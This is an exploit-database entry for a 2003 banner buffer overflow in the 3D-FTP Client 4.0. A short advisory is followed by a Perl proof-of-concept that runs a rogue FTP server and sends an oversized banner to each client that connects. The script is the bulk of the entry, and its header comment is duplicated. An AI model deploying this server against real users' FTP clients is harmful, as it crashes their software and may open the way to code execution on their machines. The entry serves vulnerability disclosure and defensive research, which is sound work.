3D-FTP Client 4.0 - Buffer Overflow

🗓️ 28 Apr 2003 00:00:00Reported by Over_GType

3D-FTP Client may allow buffer overflow, risking arbitrary code execution via banner data input.

source: https://www.securityfocus.com/bid/7451/info

It has been reported that 3D-FTP client may be prone to a buffer overflow condition. This issue is due to the client not implementing sufficient bounds checking on banner data copied into local memory buffers.

It may be possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.

#!/usr/bin/perl
########################################################
#
# Banner Buffer Overflow remote exploit in FTP Clients
#
#
#!/usr/bin/perl
########################################################
#
# Banner Buffer Overflow remote exploit in FTP Clients
#
#
#                by Over_G [DWC Gr0up]
#
#         www.dwcgr0up.com      www.overg.com
#########################################################
use IO::Socket;
$port = "21";
$data = "a";
$bsize = $ARGV[0];

print "\n  Banner Buffer Overflow remote exploit in FTP Clients\n\n";
print "           by Over G[DWC Gr0up]\n";
print "     www.dwcgr0up.com www.overg.com\n\n";

if (defined $bsize) {}
 else {
  print "Incorrect parameters.\n";
  die "Usage: perl ftpbanex.pl [buffer_size]\n";
}
print "Creating server...\n";
$buf .= $data x $bsize;
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create server.\n";
print "Awayting connections...\n";
while ($client = $server->accept())
{
 print "Client connected.\n";
 print "Attacking...";
 print $client "$buf";
 print "OK\n";
 close($client);
}

28 Apr 2003 00:00Current

7.4High risk

Vulners AI Score7.4